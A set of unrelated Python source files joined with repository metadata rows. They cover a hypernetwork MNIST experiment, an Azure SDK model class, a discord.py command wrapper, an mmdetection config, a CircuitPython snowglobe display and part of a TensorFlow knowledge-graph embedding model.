num_data = 2 ** 10 * 10
data_inputs, data_target_params, data_target_loss = [], [], []
for i in range(num_data):
hyper_train = rs_train.rand(num_hypers) * 6.0 - 3.0
print("Optimizing network parameters: ", i)
init_params = init_random_params(init_scale, elementary_layer_sizes, npr.RandomState(global_seed))
def cur_obj(w, seed):
"""The current objective function of the neural network.
:param w: The weights ([float]) of the neural network.
:param seed: The seed (integer) for sampling a hyperparameter.
:return: The current objective value (float).
"""
return train_objective(w, hyper_train, seed)
optimized_params, _, _, _ = adam(grad(cur_obj), init_params, step_size=real_step_size, num_iters=real_num_iters)
loss = valid_objective(optimized_params, hyper_train, global_seed)
data_inputs += [hyper_train]
flatten_opt_param, unflatten_vector_to_network_weights = flatten(optimized_params)
data_target_params += [flatten_opt_param]
data_target_loss += [loss]
data_inputs = np.array(data_inputs)
data_target_params = np.array(data_target_params)
data_target_loss = np.array(data_target_loss)
with open(pickle_name, 'wb') as handle:
pickle.dump({'inputs': data_inputs, 'target_params': data_target_params, 'target_loss': data_target_loss},
handle, protocol=pickle.HIGHEST_PROTOCOL)
with open(pickle_name, 'rb') as handle:
pickle_data = pickle.load(handle)
data_inputs = pickle_data['inputs']
data_target_params = pickle_data['target_params']
data_target_loss = pickle_data['target_loss']
batch_size_sample = batch_size_data
train_ind, valid_ind = batch_size_data, batch_size_data
data_inputs_train, data_inputs_valid = data_inputs[:train_ind], data_inputs[valid_ind:]
data_target_params_train, _ = data_target_params[:train_ind], data_target_params[valid_ind:]
data_target_loss_train, data_target_loss_valid = data_target_loss[:train_ind], data_target_loss[valid_ind:]
# New training for lambda, W, and lambda, Loss
weight_layer_sizes = [num_hypers, num_elementary_params]
init_weight_params = init_random_params(init_scale, weight_layer_sizes, npr.RandomState(global_seed))
def train_weight_objective_loss(weights, seed):
"""The objective for training a neural network.
:param weights: The weights ([[float]]) of the neural network.
:param seed: The seed (integer) for sampling.
:return: The training loss (float).
"""
local_data_inputs = [rs_train.rand(num_hypers) * 6.0 - 3.0 for _ in range(batch_size_sample)]
losses = [train_objective(unflatten_vector_to_network_weights(nn_predict(weights, np.array([local_data_input]),
identity)[0]),
local_data_input, global_seed)
for local_data_input in local_data_inputs]
return np.mean(np.array(losses))
def callback_weights_loss(weights, opt_iteration, g):
"""A callback for optimization.
:param weights: The hypernetwork weights
:param opt_iteration: The optimization iteration
:param g: The gradient.
:return: None
"""
if opt_iteration % 10 == 0:
print("Sampled Valid Loss Target: ", opt_iteration, ", Loss: ", train_weight_objective_loss(weights, 0))
weight_params_loss, _, _, _ = adam(grad(train_weight_objective_loss), init_weight_params,
step_size=step_size_hypernet, num_iters=num_iters_hypernet + 100,
callback=callback_weights_loss)
init_weight_params = init_random_params(init_scale, weight_layer_sizes, npr.RandomState(global_seed))
def train_weight_objective_loss_target(weights, seed):
"""The objective for training a neural network.
:param weights: The weights ([[float]]) of the neural network.
:param seed: The seed (integer) for sampling.
:return: The training loss (float).
"""
idx = rs_train.randint(np.maximum(len(data_inputs_train) - batch_size_data, 1))
local_data_inputs = data_inputs_train[idx:idx + batch_size_data]
losses = [train_objective(unflatten_vector_to_network_weights(nn_predict(weights, np.array([local_data_input]),
identity)[0]),
local_data_input, global_seed)
for local_data_input in local_data_inputs]
return np.mean(np.array(losses))
def callback_weights_loss_target(weights, opt_iteration, g):
"""A callback for optimization.
:param weights: The hypernetwork weights
:param opt_iteration: The optimization iteration
:param g: The gradient.
:return: None
"""
if opt_iteration % 10 == 0:
print("Fixed Valid Loss Target: ", opt_iteration, ", Loss: ",
train_weight_objective_loss_target(weights, 0))
weight_params_loss_target, _, _, _ = adam(grad(train_weight_objective_loss_target), init_weight_params,
step_size=step_size_hypernet, num_iters=num_iters_hypernet,
callback=callback_weights_loss_target)
print("Preparing the data for plotting...")
kernel = RBF()
gp = GaussianProcessRegressor(kernel=kernel, n_restarts_optimizer=1)
gp.fit(data_inputs_train, data_target_loss_train)
gp_loss_predictions, sigma = gp.predict(data_inputs_valid, return_std=True)
def hypernet_loss(weights, local_data_input):
"""Find the loss for the hypernetwork.
:param weights: The hypernet weights
:param local_data_input: A hyperparameter.
:return: None
"""
weight_predictions_valid = nn_predict(weights, [local_data_input], identity)
weight_predictions_valid = unflatten_vector_to_network_weights(weight_predictions_valid[0])
return valid_objective(weight_predictions_valid, None, global_seed)
loss_weight_predictions_loss = [hypernet_loss(weight_params_loss, data_input)
for data_input in data_inputs_valid]
loss_weight_predictions_loss_target = [hypernet_loss(weight_params_loss_target, data_input)
for data_input in data_inputs_valid]
fig, axs = create_figure_and_axs(fig_width=21, fig_height=7, num_cols=3, ms_size=34)
print("Drawing the scatter plot...")
min_v, max_v = 0.6, 1.1
axs[0].hexbin(data_target_loss_valid, gp_loss_predictions, extent=[min_v, max_v, min_v, max_v], cmap='Reds',
mincnt=1)
axs[1].hexbin(data_target_loss_valid, loss_weight_predictions_loss_target, extent=[min_v, max_v, min_v, max_v],
cmap='Greens', mincnt=1)
axs[2].hexbin(data_target_loss_valid, loss_weight_predictions_loss, extent=[min_v, max_v, min_v, max_v],
cmap='Blues', mincnt=1)
print("____________________________________________________________________________")
print("Number of train data points: ", batch_size_data)
print("GP Predicted Best: ", np.min(gp_loss_predictions), ", Actual Result: ",
data_target_loss_valid[np.argmin(gp_loss_predictions)])
print("Fixed Hypernet Predicted Best: ", np.min(loss_weight_predictions_loss_target),
", Actual Result: ", data_target_loss_valid[np.argmin(loss_weight_predictions_loss_target)])
print("Stochastic Hypernet Predicted Best: ", np.min(loss_weight_predictions_loss),
", Actual Result: ", data_target_loss_valid[np.argmin(loss_weight_predictions_loss)])
print("Actual Best: ", np.min(data_target_loss_valid))
print("____________________________________________________________________________")
orient_line = np.linspace(min_v, max_v, 100)
for ax in axs:
ax.plot(orient_line, orient_line, color='k')
ax.set_xlim([min_v, max_v])
ax.set_ylim([min_v, max_v])
# axs[0].set_title('GP Mean')
# axs[1].set_title('Hyper-train fixed')
# axs[2].set_title('Hyper-train')
axs[0].set_ylabel('Inferred Loss')
#axs[1].set_xlabel('True loss')
axs[1].set_yticks([])
axs[2].set_yticks([])
axs[0].set_xticks([.7, .8, .9, 1.0])
axs[1].set_xticks([.7, .8, .9, 1.0])
axs[2].set_xticks([.7, .8, .9, 1.0])
axs[0].set_yticks([.7, .8, .9, 1.0])
setup_ax_and_save(axs, fig, 'learn_vs_true_loss_scatter', do_xticks=False, do_yticks=False, y_mod=750.0, dpi=300)
for key, ax in enumerate(axs):
#if key is 0:
extent = ax.get_window_extent().transformed(fig.dpi_scale_trans.inverted())
fig.savefig('figures/ax' + str(key) + '_scatter.png', bbox_inches=extent.expanded(1.32, 1.15))
fig.savefig('figures/ax' + str(key) + '_scatter.pdf', bbox_inches=extent.expanded(1.32, 1.15))
#else:
#extent = full_extent(ax, do_yticks=False).transformed(fig.dpi_scale_trans.inverted())
#fig.savefig('figures/ax' + str(key) + '_scatter.png', bbox_inches=extent.expanded(1.0, 1.15))
print("Drawing the histograms...")
[ax.cla() for ax in axs]
bins = 50
axs[0].hist(gp_loss_predictions - data_target_loss_valid, bins=bins, color='r', normed=True, edgecolor='r')
axs[1].hist(loss_weight_predictions_loss_target - data_target_loss_valid, bins=bins, color='g', normed=True,
edgecolor='g')
axs[2].hist(loss_weight_predictions_loss - data_target_loss_valid, bins=bins, color='b', normed=True, edgecolor='b')
axs[0].set_ylabel('Frequency')
axs[1].set_xlabel('Inferred - true loss')
y_min, y_max = 10e32, -10e32
for ax in axs:
ylim = ax.get_ylim()
y_min, y_max = np.minimum(y_min, ylim[0]), np.maximum(y_max, ylim[1])
x_min, x_max = -0.35, 0.6
for ax in axs:
ax.set_xlim([x_min, x_max]), ax.set_ylim([y_min, y_max])
ax.axvline(0, ymax=1.0, linestyle='--', color='Black')
setup_ax_and_save(axs, fig, 'learn_vs_true_loss_hist', do_xticks=False)
for key, ax in enumerate(axs):
extent = full_extent(ax).transformed(fig.dpi_scale_trans.inverted())
if key is 0:
fig.savefig('figures/ax' + str(key) + '_hist.png', bbox_inches=extent) #.expand(1.32, 1.15))
fig.savefig('figures/ax' + str(key) + '_hist.pdf', bbox_inches=extent)
else:
fig.savefig('figures/ax' + str(key) + '_hist.png', bbox_inches=extent)
fig.savefig('figures/ax' + str(key) + '_hist.pdf', bbox_inches=extent)
if __name__ == '__main__':
params = opt_params(None)
n_data, n_data_val, n_data_test = 50000, params['n_data_val'], params['n_data_test']
_, train_images, train_labels, test_images, test_labels = load_mnist()
train_data = (train_images[:n_data], train_labels[:n_data])
valid_data = (train_images[n_data:n_data + n_data_val], train_labels[n_data:n_data + n_data_val])
test_data = (test_images[:n_data_test], test_labels[:n_data_test])
# Define information about the optimization procedure and networks.
init_scale = 0.00001 # The scale (positive float) for the hypernetwork initialization.
num_iters = 5000 # The number of iterations to do the optimization for (integer).
step_size = 0.0001 # The step size for the hyperparameter optimizer (positive float).
num_iters_hypernet = 500 # The number of iterations to optimize the hypernetwork for (integer).
batch_size_data = 25 # [10, 25, 100, 250, 1000, 25]
experiment(train_data, valid_data, init_scale, num_iters_hypernet, params['step_size_hypernet'], step_size,
num_iters, batch_size_data, params['global_seed'])
| 51.685131 | 124 | 0.688008 |
4a1f77c4d7d09adc1312e8c4409ac7501b2279a5 | 1,435 | py | Python | azure-mgmt-compute/azure/mgmt/compute/v2018_10_01/models/boot_diagnostics.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2021-09-07T18:36:04.000Z | 2021-09-07T18:36:04.000Z | azure-mgmt-compute/azure/mgmt/compute/v2018_10_01/models/boot_diagnostics.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 2 | 2019-10-02T23:37:38.000Z | 2020-10-02T01:17:31.000Z | azure-mgmt-compute/azure/mgmt/compute/v2018_10_01/models/boot_diagnostics.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2019-06-17T22:18:23.000Z | 2019-06-17T22:18:23.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class BootDiagnostics(Model):
"""Boot Diagnostics is a debugging feature which allows you to view Console
Output and Screenshot to diagnose VM status. <br><br> You can easily view
the output of your console log. <br><br> Azure also enables you to see a
screenshot of the VM from the hypervisor.
:param enabled: Whether boot diagnostics should be enabled on the Virtual
Machine.
:type enabled: bool
:param storage_uri: Uri of the storage account to use for placing the
console output and screenshot.
:type storage_uri: str
"""
_attribute_map = {
'enabled': {'key': 'enabled', 'type': 'bool'},
'storage_uri': {'key': 'storageUri', 'type': 'str'},
}
def __init__(self, **kwargs):
super(BootDiagnostics, self).__init__(**kwargs)
self.enabled = kwargs.get('enabled', None)
self.storage_uri = kwargs.get('storage_uri', None)
| 37.763158 | 79 | 0.6223 |
4a1f7885f54cfe81004a9025139e118ef6a92314 | 1,167 | py | Python | app/flags.py | CircuitsBots/Starboard-2 | 0c5510f210a387d1173ff20743648a47e4110780 | [
"MIT"
] | 16 | 2021-01-19T19:12:00.000Z | 2021-12-21T12:00:04.000Z | app/flags.py | Davi-the-Mudkip/Starboard-2 | 4de3c689ffef007e4f4a279251d107d890b69b15 | [
"MIT"
] | 15 | 2021-04-02T16:58:48.000Z | 2022-03-28T06:09:49.000Z | app/flags.py | Davi-the-Mudkip/Starboard-2 | 4de3c689ffef007e4f4a279251d107d890b69b15 | [
"MIT"
] | 13 | 2021-01-21T14:26:00.000Z | 2021-09-29T18:55:17.000Z | from discord.ext import flags
from discord.ext.flags import * # noqa F401
class FlagCommand(flags.FlagCommand):
def __init__(self, *args, **kwargs):
self._help = kwargs.pop("help", None)
super().__init__(*args, **kwargs)
@property
def help(self):
return str(self._help)
@help.setter
def help(self, *args, **kwargs):
pass
class FlagGroup(flags.FlagGroup):
def __init__(self, *args, **kwargs):
self._help = kwargs.pop("help", None)
super().__init__(*args, **kwargs)
@property
def help(self):
return str(self._help)
@help.setter
def help(self, *args, **kwargs):
pass
def command(self, *args, **kwargs):
kwargs.setdefault("cls", FlagCommand)
return super().command(*args, **kwargs)
def group(self, *args, **kwargs):
kwargs.setdefault("cls", FlagGroup)
return super().group(*args, **kwargs)
def command(*args, **kwargs):
kwargs.setdefault("cls", FlagCommand)
return flags.command(*args, **kwargs)
def group(*args, **kwargs):
kwargs.setdefault("cls", FlagGroup)
return flags.group(*args, **kwargs)
| 23.816327 | 47 | 0.615253 |
4a1f7967e8cf27cd91aace9b50d012b030b4b08b | 4,980 | py | Python | mmdet_configs/xview_vfnet/vfnet_crop_300_500_cls_60.py | fcakyon/sahi-benchmark | 8ffa43afb23adb914f2ba8b4bb45dd9ce1284c42 | [
"MIT"
] | 7 | 2021-12-20T05:22:56.000Z | 2022-03-28T01:57:10.000Z | mmdet_configs/xview_vfnet/vfnet_crop_300_500_cls_60.py | fcakyon/sahi-benchmark | 8ffa43afb23adb914f2ba8b4bb45dd9ce1284c42 | [
"MIT"
] | 1 | 2022-03-19T14:52:38.000Z | 2022-03-21T13:19:05.000Z | mmdet_configs/xview_vfnet/vfnet_crop_300_500_cls_60.py | fcakyon/sahi-benchmark | 8ffa43afb23adb914f2ba8b4bb45dd9ce1284c42 | [
"MIT"
] | 3 | 2022-02-23T12:26:18.000Z | 2022-03-27T14:06:58.000Z | _base_ = ["../vfnet/vfnet_r50_fpn_1x_coco.py"]
EXP_NAME = "vfnet_crop_300_500_cls_60"
DATA_ROOT = "data/xview/"
BATCH_MULTIPLIER = 8
LR_MULTIPLIER = 1
EVAL_INTERVAL = 3
NUM_CLASSES = 60
DATASET_REPEAT = 50
TAGS = ["vfnet", "crop=300_500", "24epochs", f"num_cls={NUM_CLASSES}", f"repeat={DATASET_REPEAT}"]
CLASSES = (
"Fixed-wing Aircraft",
"Small Aircraft",
"Cargo Plane",
"Helicopter",
"Passenger Vehicle",
"Small Car",
"Bus",
"Pickup Truck",
"Utility Truck",
"Truck",
"Cargo Truck",
"Truck w/Box",
"Truck Tractor",
"Trailer",
"Truck w/Flatbed",
"Truck w/Liquid",
"Crane Truck",
"Railway Vehicle",
"Passenger Car",
"Cargo Car",
"Flat Car",
"Tank car",
"Locomotive",
"Maritime Vessel",
"Motorboat",
"Sailboat",
"Tugboat",
"Barge",
"Fishing Vessel",
"Ferry",
"Yacht",
"Container Ship",
"Oil Tanker",
"Engineering Vehicle",
"Tower crane",
"Container Crane",
"Reach Stacker",
"Straddle Carrier",
"Mobile Crane",
"Dump Truck",
"Haul Truck",
"Scraper/Tractor",
"Front loader/Bulldozer",
"Excavator",
"Cement Mixer",
"Ground Grader",
"Hut/Tent",
"Shed",
"Building",
"Aircraft Hangar",
"Damaged Building",
"Facility",
"Construction Site",
"Vehicle Lot",
"Helipad",
"Storage Tank",
"Shipping container lot",
"Shipping Container",
"Pylon",
"Tower",
)
# model settings
model = dict(
bbox_head=dict(
num_classes=NUM_CLASSES,
),
)
# dataset settings
img_norm_cfg = dict(mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type="LoadImageFromFile"),
dict(type="LoadAnnotations", with_bbox=True),
dict(
type="AutoAugment",
policies=[
[
dict(type="RandomCrop", crop_type="absolute_range", crop_size=(300, 500), allow_negative_crop=True),
dict(type="Resize", img_scale=(1333, 800), keep_ratio=True),
],
[
dict(type="RandomCrop", crop_type="absolute_range", crop_size=(300, 500), allow_negative_crop=True),
dict(type="Resize", img_scale=(1333, 800), keep_ratio=True),
],
[
dict(type="RandomCrop", crop_type="absolute_range", crop_size=(300, 500), allow_negative_crop=True),
dict(type="Resize", img_scale=(1333, 800), keep_ratio=True),
],
[
dict(type="Resize", img_scale=(1333, 800), keep_ratio=True),
],
],
),
dict(type="RandomFlip", flip_ratio=0.5),
dict(type="Normalize", **img_norm_cfg),
dict(type="Pad", size_divisor=32),
dict(type="DefaultFormatBundle"),
dict(type="Collect", keys=["img", "gt_bboxes", "gt_labels"]),
]
test_pipeline = [
dict(type="LoadImageFromFile"),
dict(
type="MultiScaleFlipAug",
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type="Resize", keep_ratio=True),
dict(type="RandomFlip"),
dict(type="Normalize", **img_norm_cfg),
dict(type="Pad", size_divisor=32),
dict(type="DefaultFormatBundle"),
dict(type="Collect", keys=["img"]),
],
),
]
data = dict(
samples_per_gpu=2 * BATCH_MULTIPLIER,
workers_per_gpu=2,
train=dict(
type="RepeatDataset",
times=DATASET_REPEAT,
dataset=dict(
type="CocoDataset",
classes=CLASSES,
ann_file=DATA_ROOT + "coco/train.json",
img_prefix=DATA_ROOT + "train_images/",
pipeline=train_pipeline,
),
),
val=dict(
classes=CLASSES,
ann_file=DATA_ROOT + "sliced/val_400_0.json",
img_prefix=DATA_ROOT + "sliced/val_images_400_0/",
pipeline=test_pipeline,
),
test=dict(
classes=CLASSES,
ann_file=DATA_ROOT + "sliced/val_400_0.json",
img_prefix=DATA_ROOT + "sliced/val_images_400_0/",
pipeline=test_pipeline,
),
)
# optimizer
# default 8 gpu
# /8 for 1 gpu
optimizer = dict(
lr=0.01 / 8 * BATCH_MULTIPLIER * LR_MULTIPLIER, paramwise_cfg=dict(bias_lr_mult=2.0, bias_decay_mult=0.0)
)
checkpoint_config = dict(interval=1, max_keep_ckpts=1, save_optimizer=False)
evaluation = dict(interval=EVAL_INTERVAL, metric="bbox", save_best="auto")
# learning policy
lr_config = dict(policy="step", warmup="linear", warmup_iters=500, warmup_ratio=0.1, step=[16, 22])
runner = dict(type="EpochBasedRunner", max_epochs=24)
# logger settings
log_config = dict(
interval=50,
hooks=[
dict(type="TextLoggerHook"),
dict(type="TensorboardLoggerHook", reset_flag=False),
],
)
load_from = "https://download.openmmlab.com/mmdetection/v2.0/vfnet/vfnet_r50_fpn_1x_coco/vfnet_r50_fpn_1x_coco_20201027-38db6f58.pth"
work_dir = f"runs/xview/{EXP_NAME}/"
| 27.213115 | 133 | 0.603213 |
4a1f7a353c385041bf0d6a2fd6635d00bb480730 | 5,625 | py | Python | TFT_Gizmo_Snowglobe/snowglobe_fancy/code.py | albinger/Adafruit_Learning_System_Guides | 4fe2da261fe5d1ca282b86bd3b93ee1466346fa7 | [
"MIT"
] | null | null | null | TFT_Gizmo_Snowglobe/snowglobe_fancy/code.py | albinger/Adafruit_Learning_System_Guides | 4fe2da261fe5d1ca282b86bd3b93ee1466346fa7 | [
"MIT"
] | null | null | null | TFT_Gizmo_Snowglobe/snowglobe_fancy/code.py | albinger/Adafruit_Learning_System_Guides | 4fe2da261fe5d1ca282b86bd3b93ee1466346fa7 | [
"MIT"
] | null | null | null | # SPDX-FileCopyrightText: 2019 Carter Nelson for Adafruit Industries
#
# SPDX-License-Identifier: MIT
from random import randrange
import board
import busio
import displayio
from adafruit_gizmo import tft_gizmo
import adafruit_imageload
import adafruit_lis3dh
#---| User Config |---------------
BACKGROUND = "/blinka_dark.bmp" # specify color or background BMP file
NUM_FLAKES = 50 # total number of snowflakes
FLAKE_SHEET = "/flakes_sheet.bmp" # flake sprite sheet
FLAKE_WIDTH = 4 # sprite width
FLAKE_HEIGHT = 4 # sprite height
FLAKE_TRAN_COLOR = 0x000000 # transparency color
SNOW_COLOR = 0xFFFFFF # snow color
SHAKE_THRESHOLD = 27 # shake sensitivity, lower=more sensitive
#---| User Config |---------------
# Accelerometer setup
accelo_i2c = busio.I2C(board.ACCELEROMETER_SCL, board.ACCELEROMETER_SDA)
accelo = adafruit_lis3dh.LIS3DH_I2C(accelo_i2c, address=0x19)
# Create the TFT Gizmo display
display = tft_gizmo.TFT_Gizmo()
# Load background image
try:
bg_bitmap, bg_palette = adafruit_imageload.load(BACKGROUND,
bitmap=displayio.Bitmap,
palette=displayio.Palette)
# Or just use solid color
except (OSError, TypeError, AttributeError):
BACKGROUND = BACKGROUND if isinstance(BACKGROUND, int) else 0x000000
bg_bitmap = displayio.Bitmap(display.width, display.height, 1)
bg_palette = displayio.Palette(1)
bg_palette[0] = BACKGROUND
background = displayio.TileGrid(bg_bitmap, pixel_shader=bg_palette)
# Snowflake setup
flake_bitmap, flake_palette = adafruit_imageload.load(FLAKE_SHEET,
bitmap=displayio.Bitmap,
palette=displayio.Palette)
if FLAKE_TRAN_COLOR is not None:
for i, color in enumerate(flake_palette):
if color == FLAKE_TRAN_COLOR:
flake_palette.make_transparent(i)
break
NUM_SPRITES = flake_bitmap.width // FLAKE_WIDTH * flake_bitmap.height // FLAKE_HEIGHT
flake_pos = [0.0] * NUM_FLAKES
flakes = displayio.Group()
for _ in range(NUM_FLAKES):
flakes.append(displayio.TileGrid(flake_bitmap, pixel_shader=flake_palette,
width = 1,
height = 1,
tile_width = FLAKE_WIDTH,
tile_height = FLAKE_HEIGHT,
x = randrange(0, display.width),
default_tile=randrange(0, NUM_SPRITES)))
# Snowfield setup
snow_depth = [display.height] * display.width
snow_palette = displayio.Palette(2)
snow_palette[0] = 0xADAF00 # transparent color
snow_palette[1] = SNOW_COLOR # snow color
snow_palette.make_transparent(0)
snow_bitmap = displayio.Bitmap(display.width, display.height, len(snow_palette))
snow = displayio.TileGrid(snow_bitmap, pixel_shader=snow_palette)
# Add everything to display
splash = displayio.Group()
splash.append(background)
splash.append(flakes)
splash.append(snow)
display.show(splash)
def clear_the_snow():
#pylint: disable=global-statement, redefined-outer-name
global flakes, flake_pos, snow_depth
display.auto_refresh = False
for flake in flakes:
# set to a random sprite
flake[0] = randrange(0, NUM_SPRITES)
# set to a random x location
flake.x = randrange(0, display.width)
# set random y locations, off screen to start
flake_pos = [-1.0*randrange(0, display.height) for _ in range(NUM_FLAKES)]
# reset snow level
snow_depth = [display.height] * display.width
# and snow bitmap
for i in range(display.width*display.height):
snow_bitmap[i] = 0
display.auto_refresh = True
def add_snow(index, amount, steepness=2):
location = []
# local steepness check
for x in range(index - amount, index + amount):
add = False
if x == 0:
# check depth to right
if snow_depth[x+1] - snow_depth[x] < steepness:
add = True
elif x == display.width - 1:
# check depth to left
if snow_depth[x-1] - snow_depth[x] < steepness:
add = True
elif 0 < x < display.width - 1:
# check depth to left AND right
if snow_depth[x-1] - snow_depth[x] < steepness and \
snow_depth[x+1] - snow_depth[x] < steepness:
add = True
if add:
location.append(x)
# add where snow is not too steep
for x in location:
new_level = snow_depth[x] - 1
if new_level >= 0:
snow_depth[x] = new_level
snow_bitmap[x, new_level] = 1
while True:
clear_the_snow()
# loop until globe is full of snow
while snow_depth.count(0) < display.width:
# check for shake
if accelo.shake(SHAKE_THRESHOLD, 5, 0):
break
# update snowflakes
for i, flake in enumerate(flakes):
# speed based on sprite index
flake_pos[i] += 1 - flake[0] / NUM_SPRITES
# check if snowflake has hit the ground
if flake_pos[i] >= snow_depth[flake.x]:
# add snow where it fell
add_snow(flake.x, FLAKE_WIDTH)
# reset flake to top
flake_pos[i] = 0
# at a new x location
flake.x = randrange(0, display.width)
flake.y = int(flake_pos[i])
display.refresh()
| 37.251656 | 85 | 0.610311 |
4a1f7a703480261ceb5adca7af5d305bb3272907 | 28,804 | py | Python | code/MultiKE_model.py | DuanXu-97/MultiKE | a210a0c638ef4d91562bf098acb7153028dd74fc | [
"MIT"
] | 1 | 2020-06-23T07:32:31.000Z | 2020-06-23T07:32:31.000Z | code/MultiKE_model.py | DuanXu-97/MultiKE | a210a0c638ef4d91562bf098acb7153028dd74fc | [
"MIT"
] | null | null | null | code/MultiKE_model.py | DuanXu-97/MultiKE | a210a0c638ef4d91562bf098acb7153028dd74fc | [
"MIT"
] | null | null | null | import math
import random
import multiprocessing as mp
import base.batch as bat
from utils import *
from base.initializers import xavier_init
from attr_batch import generate_attribute_triple_batch_queue
from utils import save_embeddings
from losses import relation_logistic_loss, attribute_logistic_loss, relation_logistic_loss_wo_negs, \
attribute_logistic_loss_wo_negs, space_mapping_loss, alignment_loss, logistic_loss_wo_negs, orthogonal_loss
def get_optimizer(opt, learning_rate):
if opt == 'Adagrad':
optimizer = tf.train.AdagradOptimizer(learning_rate)
elif opt == 'Adadelta':
# To match the exact form in the original paper use 1.0.
optimizer = tf.train.AdadeltaOptimizer(learning_rate)
elif opt == 'Adam':
optimizer = tf.train.AdamOptimizer(learning_rate)
else: # opt == 'SGD'
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
return optimizer
def generate_optimizer(loss, learning_rate, var_list=None, opt='SGD'):
optimizer = get_optimizer(opt, learning_rate)
grads_and_vars = optimizer.compute_gradients(loss, var_list=var_list)
return optimizer.apply_gradients(grads_and_vars)
def conv(attr_hs, attr_as, attr_vs, dim, feature_map_size=2, kernel_size=[2, 4], activation=tf.nn.tanh, layer_num=2):
# print("feature map size", feature_map_size)
# print("kernel size", kernel_size)
# print("layer_num", layer_num)
attr_as = tf.reshape(attr_as, [-1, 1, dim])
attr_vs = tf.reshape(attr_vs, [-1, 1, dim])
input_avs = tf.concat([attr_as, attr_vs], 1)
input_shape = input_avs.shape.as_list()
input_layer = tf.reshape(input_avs, [-1, input_shape[1], input_shape[2], 1])
# print("input_layer", input_layer.shape)
_conv = input_layer
_conv = tf.layers.batch_normalization(_conv, 2)
for i in range(layer_num):
_conv = tf.layers.conv2d(inputs=_conv,
filters=feature_map_size,
kernel_size=kernel_size,
strides=[1, 1],
padding="same",
activation=activation)
# print("conv" + str(i + 1), _conv.shape)
_conv = tf.nn.l2_normalize(_conv, 2)
_shape = _conv.shape.as_list()
_flat = tf.reshape(_conv, [-1, _shape[1] * _shape[2] * _shape[3]])
# print("_flat", _flat.shape)
dense = tf.layers.dense(inputs=_flat, units=dim, activation=activation)
dense = tf.nn.l2_normalize(dense) # important!!
# print("dense", dense.shape)
score = -tf.reduce_sum(tf.square(attr_hs - dense), 1)
return score
class MultiKE:
def __check_args(self):
assert self.args.alignment_module == 'swapping' # for cross-KG inference
def __init__(self, data, args, attr_align_model):
self.predicate_align_model = attr_align_model
self.args = args
self.__check_args()
self.data = data
self.kgs = kgs = data.kgs
self.kg1 = kgs.kg1
self.kg2 = kgs.kg2
self.out_folder = generate_out_folder(self.args.output, self.args.training_data, '', self.__class__.__name__)
self.session = None
def _define_variables(self):
with tf.variable_scope('literal' + 'embeddings'):
self.literal_embeds = tf.constant(self.data.value_vectors, dtype=tf.float32)
with tf.variable_scope('name_view' + 'embeddings'):
self.name_embeds = tf.constant(self.data.local_name_vectors, dtype=tf.float32)
with tf.variable_scope('relation_view' + 'embeddings'):
self.rv_ent_embeds = xavier_init([self.kgs.entities_num, self.args.dim], 'rv_ent_embeds', True)
self.rel_embeds = xavier_init([self.kgs.relations_num, self.args.dim], 'rel_embeds', True)
with tf.variable_scope('attribute_view' + 'embeddings'):
self.av_ent_embeds = xavier_init([self.kgs.entities_num, self.args.dim], 'av_ent_embeds', True)
# False important!
self.attr_embeds = xavier_init([self.kgs.attributes_num, self.args.dim], 'attr_embeds', False)
with tf.variable_scope('shared' + 'embeddings'):
self.ent_embeds = xavier_init([self.kgs.entities_num, self.args.dim], 'ent_embeds', True)
with tf.variable_scope('shared' + 'combination'):
self.nv_mapping = tf.get_variable('nv_mapping', shape=[self.args.dim, self.args.dim],
initializer=tf.initializers.orthogonal())
self.rv_mapping = tf.get_variable('rv_mapping', shape=[self.args.dim, self.args.dim],
initializer=tf.initializers.orthogonal())
self.av_mapping = tf.get_variable('av_mapping', shape=[self.args.dim, self.args.dim],
initializer=tf.initializers.orthogonal())
self.eye_mat = tf.constant(np.eye(self.args.dim), dtype=tf.float32, name='eye')
# --- The followings are view-specific embedding models --- #
def _define_name_view_graph(self):
pass
def _define_relation_view_graph(self):
with tf.name_scope('relation_triple_placeholder'):
self.rel_pos_hs = tf.placeholder(tf.int32, shape=[None])
self.rel_pos_rs = tf.placeholder(tf.int32, shape=[None])
self.rel_pos_ts = tf.placeholder(tf.int32, shape=[None])
self.rel_neg_hs = tf.placeholder(tf.int32, shape=[None])
self.rel_neg_rs = tf.placeholder(tf.int32, shape=[None])
self.rel_neg_ts = tf.placeholder(tf.int32, shape=[None])
with tf.name_scope('relation_triple_lookup'):
rel_phs = tf.nn.embedding_lookup(self.rv_ent_embeds, self.rel_pos_hs)
rel_prs = tf.nn.embedding_lookup(self.rel_embeds, self.rel_pos_rs)
rel_pts = tf.nn.embedding_lookup(self.rv_ent_embeds, self.rel_pos_ts)
rel_nhs = tf.nn.embedding_lookup(self.rv_ent_embeds, self.rel_neg_hs)
rel_nrs = tf.nn.embedding_lookup(self.rel_embeds, self.rel_neg_rs)
rel_nts = tf.nn.embedding_lookup(self.rv_ent_embeds, self.rel_neg_ts)
with tf.name_scope('relation_triple_loss'):
self.relation_loss = relation_logistic_loss(rel_phs, rel_prs, rel_pts, rel_nhs, rel_nrs, rel_nts)
self.relation_optimizer = generate_optimizer(self.relation_loss, self.args.learning_rate,
opt=self.args.optimizer)
def _define_attribute_view_graph(self):
with tf.name_scope('attribute_triple_placeholder'):
self.attr_pos_hs = tf.placeholder(tf.int32, shape=[None])
self.attr_pos_as = tf.placeholder(tf.int32, shape=[None])
self.attr_pos_vs = tf.placeholder(tf.int32, shape=[None])
self.attr_pos_ws = tf.placeholder(tf.float32, shape=[None])
with tf.name_scope('attribute_triple_lookup'):
attr_phs = tf.nn.embedding_lookup(self.av_ent_embeds, self.attr_pos_hs)
attr_pas = tf.nn.embedding_lookup(self.attr_embeds, self.attr_pos_as)
